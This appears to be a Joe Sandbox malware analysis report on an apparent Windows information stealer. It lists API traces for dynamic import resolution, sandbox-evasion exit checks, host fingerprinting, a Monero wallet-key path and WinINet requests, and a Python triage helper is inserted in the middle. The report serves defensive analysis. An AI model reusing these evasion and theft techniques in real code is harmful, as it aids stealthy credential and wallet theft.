                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0

Control-flow Graph (graph rendering omitted; basic blocks 1d9c10-1da709, calling LoadLibraryA and GetProcAddress as listed below)
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014957F0), ref: 001D9C2D
                              • GetProcAddress.KERNEL32(74DD0000,014958B0), ref: 001D9C45
                              • GetProcAddress.KERNEL32(74DD0000,014A9610), ref: 001D9C5E
                              • GetProcAddress.KERNEL32(74DD0000,014A96B8), ref: 001D9C76
                              • GetProcAddress.KERNEL32(74DD0000,014A9670), ref: 001D9C8E
                              • GetProcAddress.KERNEL32(74DD0000,014A9628), ref: 001D9CA7
                              • GetProcAddress.KERNEL32(74DD0000,0149B608), ref: 001D9CBF
                              • GetProcAddress.KERNEL32(74DD0000,014AD488), ref: 001D9CD7
                              • GetProcAddress.KERNEL32(74DD0000,014AD470), ref: 001D9CF0
                              • GetProcAddress.KERNEL32(74DD0000,014AD4A0), ref: 001D9D08
                              • GetProcAddress.KERNEL32(74DD0000,014AD3F8), ref: 001D9D20
                              • GetProcAddress.KERNEL32(74DD0000,01495810), ref: 001D9D39
                              • GetProcAddress.KERNEL32(74DD0000,01495830), ref: 001D9D51
                              • GetProcAddress.KERNEL32(74DD0000,014958F0), ref: 001D9D69
                              • GetProcAddress.KERNEL32(74DD0000,01495A30), ref: 001D9D82
                              • GetProcAddress.KERNEL32(74DD0000,014AD5A8), ref: 001D9D9A
                              • GetProcAddress.KERNEL32(74DD0000,014AD428), ref: 001D9DB2
                              • GetProcAddress.KERNEL32(74DD0000,0149B6F8), ref: 001D9DCB
                              • GetProcAddress.KERNEL32(74DD0000,01495A90), ref: 001D9DE3
                              • GetProcAddress.KERNEL32(74DD0000,014AD4D0), ref: 001D9DFB
                              • GetProcAddress.KERNEL32(74DD0000,014AD410), ref: 001D9E14
                              • GetProcAddress.KERNEL32(74DD0000,014AD4B8), ref: 001D9E2C
                              • GetProcAddress.KERNEL32(74DD0000,014AD4E8), ref: 001D9E44
                              • GetProcAddress.KERNEL32(74DD0000,014956B0), ref: 001D9E5D
                              • GetProcAddress.KERNEL32(74DD0000,014AD578), ref: 001D9E75
                              • GetProcAddress.KERNEL32(74DD0000,014AD440), ref: 001D9E8D
                              • GetProcAddress.KERNEL32(74DD0000,014AD458), ref: 001D9EA6
                              • GetProcAddress.KERNEL32(74DD0000,014AD500), ref: 001D9EBE
                              • GetProcAddress.KERNEL32(74DD0000,014AD518), ref: 001D9ED6
                              • GetProcAddress.KERNEL32(74DD0000,014AD530), ref: 001D9EEF
                              • GetProcAddress.KERNEL32(74DD0000,014AD548), ref: 001D9F07
                              • GetProcAddress.KERNEL32(74DD0000,014AD590), ref: 001D9F1F
                              • GetProcAddress.KERNEL32(74DD0000,014AD560), ref: 001D9F38
                              • GetProcAddress.KERNEL32(74DD0000,014AA4B0), ref: 001D9F50
                              • GetProcAddress.KERNEL32(74DD0000,014ACE58), ref: 001D9F68
                              • GetProcAddress.KERNEL32(74DD0000,014AD098), ref: 001D9F81
                              • GetProcAddress.KERNEL32(74DD0000,01495990), ref: 001D9F99
                              • GetProcAddress.KERNEL32(74DD0000,014ACE70), ref: 001D9FB1
                              • GetProcAddress.KERNEL32(74DD0000,014959B0), ref: 001D9FCA
                              • GetProcAddress.KERNEL32(74DD0000,014AD0B0), ref: 001D9FE2
                              • GetProcAddress.KERNEL32(74DD0000,014ACFF0), ref: 001D9FFA
                              • GetProcAddress.KERNEL32(74DD0000,014956D0), ref: 001DA013
                              • GetProcAddress.KERNEL32(74DD0000,01495CB0), ref: 001DA02B
                              • LoadLibraryA.KERNEL32(014AD008,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA03D
                              • LoadLibraryA.KERNEL32(014ACE88,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA04E
                              • LoadLibraryA.KERNEL32(014ACEA0,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA060
                              • LoadLibraryA.KERNEL32(014AD020,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA072
                              • LoadLibraryA.KERNEL32(014ACEB8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA083
                              • LoadLibraryA.KERNEL32(014AD068,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA095
                              • LoadLibraryA.KERNEL32(014AD0C8,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0A7
                              • LoadLibraryA.KERNEL32(014ACED0,?,001D5CA3,001E0AEB,?,?,?,?,?,?,?,?,?,?,001E0AEA,001E0AE3), ref: 001DA0B8
                              • GetProcAddress.KERNEL32(75290000,01495C90), ref: 001DA0DA
                              • GetProcAddress.KERNEL32(75290000,014ACE40), ref: 001DA0F2
                              • GetProcAddress.KERNEL32(75290000,014A9038), ref: 001DA10A
                              • GetProcAddress.KERNEL32(75290000,014ACEE8), ref: 001DA123
                              • GetProcAddress.KERNEL32(75290000,01495E30), ref: 001DA13B
                              • GetProcAddress.KERNEL32(734C0000,0149B5E0), ref: 001DA160
                              • GetProcAddress.KERNEL32(734C0000,01495D50), ref: 001DA179
                              • GetProcAddress.KERNEL32(734C0000,0149B838), ref: 001DA191
                              • GetProcAddress.KERNEL32(734C0000,014ACF00), ref: 001DA1A9
                              • GetProcAddress.KERNEL32(734C0000,014ACF18), ref: 001DA1C2
                              • GetProcAddress.KERNEL32(734C0000,01495E10), ref: 001DA1DA
                              • GetProcAddress.KERNEL32(734C0000,01495DB0), ref: 001DA1F2
                              • GetProcAddress.KERNEL32(734C0000,014AD080), ref: 001DA20B
                              • GetProcAddress.KERNEL32(752C0000,01495DF0), ref: 001DA22C
                              • GetProcAddress.KERNEL32(752C0000,01495CD0), ref: 001DA244
                              • GetProcAddress.KERNEL32(752C0000,014ACFA8), ref: 001DA25D
                              • GetProcAddress.KERNEL32(752C0000,014ACF30), ref: 001DA275
                              • GetProcAddress.KERNEL32(752C0000,01495D90), ref: 001DA28D
                              • GetProcAddress.KERNEL32(74EC0000,0149B630), ref: 001DA2B3
                              • GetProcAddress.KERNEL32(74EC0000,0149B658), ref: 001DA2CB
                              • GetProcAddress.KERNEL32(74EC0000,014ACF48), ref: 001DA2E3
                              • GetProcAddress.KERNEL32(74EC0000,01495CF0), ref: 001DA2FC
                              • GetProcAddress.KERNEL32(74EC0000,01495D10), ref: 001DA314
                              • GetProcAddress.KERNEL32(74EC0000,0149B770), ref: 001DA32C
                              • GetProcAddress.KERNEL32(75BD0000,014ACF60), ref: 001DA352
                              • GetProcAddress.KERNEL32(75BD0000,01495D30), ref: 001DA36A
                              • GetProcAddress.KERNEL32(75BD0000,014A9088), ref: 001DA382
                              • GetProcAddress.KERNEL32(75BD0000,014AD038), ref: 001DA39B
                              • GetProcAddress.KERNEL32(75BD0000,014ACFC0), ref: 001DA3B3
                              • GetProcAddress.KERNEL32(75BD0000,01495BF0), ref: 001DA3CB
                              • GetProcAddress.KERNEL32(75BD0000,01495B70), ref: 001DA3E4
                              • GetProcAddress.KERNEL32(75BD0000,014ACFD8), ref: 001DA3FC
                              • GetProcAddress.KERNEL32(75BD0000,014ACF78), ref: 001DA414
                              • GetProcAddress.KERNEL32(75A70000,01495AF0), ref: 001DA436
                              • GetProcAddress.KERNEL32(75A70000,014ACF90), ref: 001DA44E
                              • GetProcAddress.KERNEL32(75A70000,014AD050), ref: 001DA466
                              • GetProcAddress.KERNEL32(75A70000,014AD0E0), ref: 001DA47F
                              • GetProcAddress.KERNEL32(75A70000,014ACDF8), ref: 001DA497
                              • GetProcAddress.KERNEL32(75450000,01495C70), ref: 001DA4B8
                              • GetProcAddress.KERNEL32(75450000,01495D70), ref: 001DA4D1
                              • GetProcAddress.KERNEL32(75DA0000,01495DD0), ref: 001DA4F2
                              • GetProcAddress.KERNEL32(75DA0000,014ACE10), ref: 001DA50A
                              • GetProcAddress.KERNEL32(6F070000,01495B10), ref: 001DA530
                              • GetProcAddress.KERNEL32(6F070000,01495E50), ref: 001DA548
                              • GetProcAddress.KERNEL32(6F070000,01495B90), ref: 001DA560
                              • GetProcAddress.KERNEL32(6F070000,014ACE28), ref: 001DA579
                              • GetProcAddress.KERNEL32(6F070000,01495B30), ref: 001DA591
                              • GetProcAddress.KERNEL32(6F070000,01495C50), ref: 001DA5A9
                              • GetProcAddress.KERNEL32(6F070000,01495C30), ref: 001DA5C2
                              • GetProcAddress.KERNEL32(6F070000,01495B50), ref: 001DA5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 001DA5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 001DA607
                              • GetProcAddress.KERNEL32(75AF0000,014AD200), ref: 001DA629
                              • GetProcAddress.KERNEL32(75AF0000,014A8FB8), ref: 001DA641
                              • GetProcAddress.KERNEL32(75AF0000,014AD2D8), ref: 001DA659
                              • GetProcAddress.KERNEL32(75AF0000,014AD260), ref: 001DA672
                              • GetProcAddress.KERNEL32(75D90000,01495BD0), ref: 001DA693
                              • GetProcAddress.KERNEL32(6CFA0000,014AD320), ref: 001DA6B4
                              • GetProcAddress.KERNEL32(6CFA0000,01495AB0), ref: 001DA6CD
                              • GetProcAddress.KERNEL32(6CFA0000,014AD2F0), ref: 001DA6E5
                              • GetProcAddress.KERNEL32(6CFA0000,014AD350), ref: 001DA6FD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166

Control-flow Graph (graph rendering omitted; basic blocks 1c6280-1c652d, the WinINet request path listed below)
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001C63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001C63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001C63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C646D
                              • InternetCloseHandle.WININET(00000000), ref: 001C64EF
                              • InternetCloseHandle.WININET(00000000), ref: 001C64F9
                              • InternetCloseHandle.WININET(00000000), ref: 001C6503
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195

Control-flow Graph (graph rendering omitted; basic blocks 1d5510-1d5ac6, the StrCmpCA/ERROR checks and Sleep listed below)
                              APIs
                                • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                                • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D56A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5857
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001D51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5228
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5318
                                • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D532F
                                • Part of subcall function 001D52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 001D5364
                                • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D5383
                                • Part of subcall function 001D52C0: lstrlen.KERNEL32(00000000), ref: 001D53AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001D5940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001D5A0C
                              • Sleep.KERNEL32(0000EA60), ref: 001D5A1B
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934

Control-flow Graph (graph rendering omitted; basic blocks 1d17a0-1d19cd, the "block" string check and ExitProcess listed below)
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 001D17C5
                              • ExitProcess.KERNEL32 ref: 001D17D1
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                              • Instruction ID: 3b5545bfde25496e994b35395ece2a6ae118fc99518c2b14f2548c027678cf54
                              • Opcode Fuzzy Hash: 75085fe1ac08a5c4673048ed3e2da7c03d9f7657c5e719c0686aba111267aa3b
                              • Instruction Fuzzy Hash: 9C514DB5A0420AFFCB08DFE1D9A4ABE77B5BF44708F10905AE406A7350D770EA51DB62

                              Control-flow Graph

Control-flow graph (text summary of the rendered graph): 1d7500-1d754a calls GetWindowsDirectoryA; 1d7553-1d75c7 calls GetVolumeInformationA and then 1d8d00 three times; 1d75d8-1d75fa is a loop that calls 1d8d00; 1d75fc-1d7617 calls GetProcessHeap and RtlAllocateHeap and then takes either 1d7619-1d7626 (call 1da740) or 1d7628-1d7658 (wsprintfA, then call 1da740); both branches rejoin at 1d767e-1d768e.
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001D7542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001D757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D760A
                              • wsprintfA.USER32 ref: 001D7640
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\
                              • API String ID: 1544550907-3809124531
                              • Opcode ID: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                              • Instruction ID: ac925e86425f109bf996a0a4a0a7a367a429866c99c26f13d6bbf8797ee8b4dd
                              • Opcode Fuzzy Hash: 1c229ff4ad43a190641dbdd6504134e5174b0b4f925bb6b45d2333002f14749b
                              • Instruction Fuzzy Hash: 024181B1D04358ABDB10DF94DC45BEEBBB8AF18704F10419AF509772C0E775AA44CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A23B0), ref: 001D98A1
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2308), ref: 001D98BA
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2440), ref: 001D98D2
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2458), ref: 001D98EA
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A22A8), ref: 001D9903
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A90C8), ref: 001D991B
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,01495910), ref: 001D9933
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,01495750), ref: 001D994C
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2470), ref: 001D9964
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A24D0), ref: 001D997C
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2488), ref: 001D9995
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2248), ref: 001D99AD
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014958D0), ref: 001D99C5
                                • Part of subcall function 001D9860: GetProcAddress.KERNEL32(74DD0000,014A2278), ref: 001D99DE
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001C11D0: ExitProcess.KERNEL32 ref: 001C1211
                                • Part of subcall function 001C1160: GetSystemInfo.KERNEL32(?), ref: 001C116A
                                • Part of subcall function 001C1160: ExitProcess.KERNEL32 ref: 001C117E
                                • Part of subcall function 001C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
                                • Part of subcall function 001C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
                                • Part of subcall function 001C1110: ExitProcess.KERNEL32 ref: 001C1143
                                • Part of subcall function 001C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
                                • Part of subcall function 001C1220: ExitProcess.KERNEL32 ref: 001C1294
                                • Part of subcall function 001D6770: GetUserDefaultLangID.KERNEL32 ref: 001D6774
                                • Part of subcall function 001C1190: ExitProcess.KERNEL32 ref: 001C11C6
                                • Part of subcall function 001D7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001C11B7), ref: 001D7880
                                • Part of subcall function 001D7850: RtlAllocateHeap.NTDLL(00000000), ref: 001D7887
                                • Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
                                • Part of subcall function 001D78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7910
                                • Part of subcall function 001D78E0: RtlAllocateHeap.NTDLL(00000000), ref: 001D7917
                                • Part of subcall function 001D78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 001D792F
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                              • Sleep.KERNEL32(00001770), ref: 001D6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                              • ExitProcess.KERNEL32 ref: 001D6B22
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                              • Instruction ID: 56848e4a0d9a8341872a63fbb8e8a46d62d9e76056a42421ad43ddb698981f75
                              • Opcode Fuzzy Hash: c6c3266ee73cfdad01cdd7be8abaf69fed322282218919e951389580eda7c53c
                              • Instruction Fuzzy Hash: C6312371940218ABDB04F7F0DC56FEE7778AF24301F90452AF502A22D2DF749905D7A6
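The listings above repeat one shape several times: a function queries the environment (GlobalMemoryStatusEx, GetSystemInfo, VirtualAllocExNuma, the OpenEventA/CreateEventA/Sleep loop) and also contains a call to ExitProcess. The Python helper below is an added example, not code from the Joe Sandbox report, from Joe Sandbox, or from the analysed sample: it parses API lines in the report's own format, flags functions where an environment probe and ExitProcess appear together, and decodes the raw arguments that matter (Sleep 0x1770, the 0x1F0003 access mask, the 0x3000 and 0x40 allocation values). The SAMPLE text is an abridged, constructed copy of the listing above; the PROBE_APIS set and the stack-argument reading in decode_numa_alloc are assumptions made for the example.

```python
"""Triage helper for the 'APIs' listings in a Joe Sandbox report.

Added example; not code from the report, from Joe Sandbox, or from the sample.
"""
import re
from collections import defaultdict

# Constructed input: abridged copies of API lines from the listing above
# (function 001D6ABA and its subcalls), kept in the report's own format.
SAMPLE = """\
• Part of subcall function 001C1160: GetSystemInfo.KERNEL32(?), ref: 001C116A
• Part of subcall function 001C1160: ExitProcess.KERNEL32 ref: 001C117E
• Part of subcall function 001C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 001C112B
• Part of subcall function 001C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 001C1132
• Part of subcall function 001C1110: ExitProcess.KERNEL32 ref: 001C1143
• Part of subcall function 001C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 001C123E
• Part of subcall function 001C1220: ExitProcess.KERNEL32 ref: 001C1294
• Part of subcall function 001D6770: GetUserDefaultLangID.KERNEL32 ref: 001D6774
• Part of subcall function 001D7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 001D789F
• OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?), ref: 001D6ACA
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
• Sleep.KERNEL32(00001770), ref: 001D6B04
• ExitProcess.KERNEL32 ref: 001D6B22
"""

API_LINE = re.compile(
    r"^[\s\u2022]*(?:Part of subcall function (?P<func>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# APIs this sample pairs with ExitProcess (see the listings above). Treating any
# of them plus ExitProcess in one function as an environment gate is an
# assumption of this helper, not a rule stated by the report.
PROBE_APIS = {"GlobalMemoryStatusEx", "GetSystemInfo", "VirtualAllocExNuma",
              "GetUserDefaultLangID", "OpenEventA"}

# Win32 constants (winnt.h / synchapi.h) used to decode the raw arguments.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x100000: "MEM_TOP_DOWN"}
PAGE_PROT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EVENT_ALL_ACCESS = 0x1F0003


def parse_api_lines(text):
    """Parse report lines into dicts; '?' arguments become None."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        calls.append({
            "func": m.group("func") or "caller",   # direct calls belong to the listed function
            "api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
            "args": [None if a == "?" else int(a, 16) for a in raw],
        })
    return calls


def find_exit_gates(calls):
    """Functions that both probe the environment and call ExitProcess."""
    by_func = defaultdict(list)
    for c in calls:
        by_func[c["func"]].append(c["api"])
    return {func: sorted(set(apis) & PROBE_APIS)
            for func, apis in by_func.items()
            if "ExitProcess" in apis and set(apis) & PROBE_APIS}


def decode_flags(value, table):
    """Name the bits of `value` found in `table`; leftover bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table.keys())
    return names + ([hex(rest)] if rest else [])


def decode_numa_alloc(stack):
    """Joe Sandbox prints the stack as seen at the call site. The five values on
    the GetCurrentProcess line above are read here as the parameters already
    pushed for the following VirtualAllocExNuma call (lpAddress, dwSize,
    flAllocationType, flProtect, nndPreferred); that reading is an assumption."""
    _addr, size, alloc_type, protect, node = stack[:5]
    return {"size": size, "type": decode_flags(alloc_type, MEM_FLAGS),
            "protect": decode_flags(protect, PAGE_PROT), "node": node}


def summarize(calls):
    """Notes, keyed by call site, for the argument values worth a second look."""
    notes = {}
    for c in calls:
        a, api = c["args"], c["api"]
        if api == "Sleep" and a and a[0] is not None:
            notes[c["ref"]] = f"Sleep {a[0]} ms ({a[0] / 1000:g} s)"
        elif api == "OpenEventA" and a and a[0] == EVENT_ALL_ACCESS:
            notes[c["ref"]] = "OpenEventA(EVENT_ALL_ACCESS): probes for a named event"
        elif api == "GetCurrentProcess" and len(a) >= 5 and None not in a[:5]:
            d = decode_numa_alloc(a)
            notes[c["ref"]] = (f"VirtualAllocExNuma {d['size']} bytes, "
                               f"{'|'.join(d['type'])}, {'|'.join(d['protect'])}, node {d['node']}")
    return notes


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for func, probes in find_exit_gates(calls).items():
        print(f"{func}: {', '.join(probes)} -> ExitProcess")
    for ref, note in summarize(calls).items():
        print(f"{ref}: {note}")
```

Run against the constructed sample, find_exit_gates reports 001C1160 (GetSystemInfo), 001C1110 (VirtualAllocExNuma), 001C1220 (GlobalMemoryStatusEx) and the listed function itself (OpenEventA), while 001D6770 is not flagged because no ExitProcess appears in its lines here; that negative case is the reason the check is per function rather than per API. The decoded values are 6 s for the Sleep and a 2000-byte MEM_COMMIT|MEM_RESERVE PAGE_EXECUTE_READWRITE allocation on NUMA node 0.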

                              Control-flow Graph

Control-flow graph (text summary of the rendered graph): 1d6aba-1d6ad7 calls 1daad0 and OpenEventA. One branch, 1d6af5-1d6b04, calls CloseHandle and Sleep and returns to the loop head at 1d6b0a, which either re-enters 1d6aba or falls through to 1d6b0c; the other, 1d6ad9-1d6af1, calls 1daad0 and CreateEventA and continues to 1d6b0c-1d6b22, which calls 1d6920 and 1d5b10, then CloseHandle and ExitProcess.
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001D6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 001D6AF9
                              • Sleep.KERNEL32(00001770), ref: 001D6B04
                              • CloseHandle.KERNEL32(?,00000000,?,014A90D8,?,001E110C,?,00000000,?,001E1110,?,00000000,001E0AEF), ref: 001D6B1A
                              • ExitProcess.KERNEL32 ref: 001D6B22
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                              • Instruction ID: 7fb685d9ee84127ecffa19bf0666dec68f0f017d93d8810926bdf130a1a6a69e
                              • Opcode Fuzzy Hash: 5e7c4082baa9063e73f45a5f2453f5ae50197617195a035fe675c7e6c4c7a726
                              • Instruction Fuzzy Hash: D6F05E30A40329AFEB00EBA0DD06BBD7B34EF14701F108927F502B22C1DBB05540D69A

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                              Strings
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 3376183f9d1dd09f101d879d895ed270a9789af4c711f93860b24f92697fcb8b
                              • Instruction ID: 21aed0b43ba0af8563f80d11fbca552da24ffdf485c210565c0bc32d9e2778c2
                              • Opcode Fuzzy Hash: 3376183f9d1dd09f101d879d895ed270a9789af4c711f93860b24f92697fcb8b
                              • Instruction Fuzzy Hash: 79213BB1D00209ABDF14DFA4E845ADE7B74FF45320F108626F929A7281EB706A05CB92

                              Control-flow Graph

                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C6280: InternetOpenA.WININET(001E0DFE,00000001,00000000,00000000,00000000), ref: 001C62E1
                                • Part of subcall function 001C6280: StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C6303
                                • Part of subcall function 001C6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C6335
                                • Part of subcall function 001C6280: HttpOpenRequestA.WININET(00000000,GET,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C6385
